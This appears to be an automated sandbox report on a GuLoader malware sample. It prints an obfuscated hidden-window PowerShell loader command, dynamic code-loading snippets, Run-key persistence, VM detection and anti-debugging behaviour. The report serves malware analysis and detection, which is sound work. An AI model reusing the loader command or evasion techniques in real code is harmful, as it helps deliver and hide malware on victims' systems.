        Source: Binary string: wntdll.pdbUGP source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: cmd.pdb source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000001.00000002.2067336932.000000000BC43000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Harder171 $Dodonean $Manchette192), (Aarskarakter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Replikskiftet = [AppDomain]::CurrentDomain.GetAssemblies(
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Winiest)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Editioners, $false).DefineType($Breastwood, $Ramo
        Obfuscated command line found
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Users\user\Desktop\160420241245287.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
        Source: C:\Users\user\Desktop\160420241245287.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"Jump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BD1187 push eax; retf 0070h1_2_04BD1192
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BD1177 push eax; retf 0070h1_2_04BD1182
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BD116D push eax; retf 0070h1_2_04BD1172
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D225F pushad ; ret 12_2_030D27F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D27FA pushad ; ret 12_2_030D27F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031009AD push ecx; mov dword ptr [esp], ecx12_2_031009B6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D283D push eax; iretd 12_2_030D2858
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D1368 push eax; iretd 12_2_030D1369
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02838208 push ds; retf 12_2_0283820A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02850268 push edi; iretd 12_2_02850278
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02850270 push edi; iretd 12_2_02850278
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284039F push ss; ret 12_2_028403C4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_028443C0 push edi; retf 12_2_028443CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_028403D1 push E16F236Ah; retn 0031h12_2_028403D6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02850046 push FFFFFF8Ch; iretd 12_2_02850077
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_028421B0 push esi; retf 12_2_028421BB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0285067E push ecx; ret 12_2_028506AE
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284CBAE push eax; retf 12_2_0284CBB1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02844FC8 pushfd ; retf 12_2_02844FDD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284B681 push ebp; ret 12_2_0284B68C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Untapestried.exeJump to dropped file
        Source: C:\Users\user\Desktop\160420241245287.exeFile created: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dllJump to dropped file
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LgplanteJump to behavior
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LgplanteJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E rdtsc 12_2_0314096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7881Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1929Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 6569Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 3402Jump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dllJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 2.3 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168Thread sleep count: 6569 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168Thread sleep time: -13138000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168Thread sleep count: 3402 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exe TID: 8168Thread sleep time: -6804000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe TID: 1740Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose,12_2_0284B880
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: 160420241245287.exe, 00000000.00000002.1650258506.0000000000750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-1
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW bw
        Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
        Source: Untapestried.exe, 00000007.00000003.2058238428.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2058348263.0000000004771000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2158641488.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887063511.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: firefox.exe, 0000000E.00000002.2438974252.000001EC1020C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
        Source: C:\Users\user\Desktop\160420241245287.exeAPI call chain: ExitProcess graph end nodegraph_0-3754
        Source: C:\Users\user\Desktop\160420241245287.exeAPI call chain: ExitProcess graph end nodegraph_0-3760
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Hides threads from debuggers
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314096E rdtsc 12_2_0314096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0327D508 LdrInitializeThunk,LdrInitializeThunk,1_2_0327D508
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03120310 mov ecx, dword ptr fs:[00000030h]12_2_03120310
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h]12_2_0313A30B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h]12_2_0313A30B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A30B mov eax, dword ptr fs:[00000030h]12_2_0313A30B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030FC310 mov ecx, dword ptr fs:[00000030h]12_2_030FC310
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h]12_2_031D8324
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D8324 mov ecx, dword ptr fs:[00000030h]12_2_031D8324
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031D8324 mov eax, dword ptr fs:[00000030h]12_2_031D8324
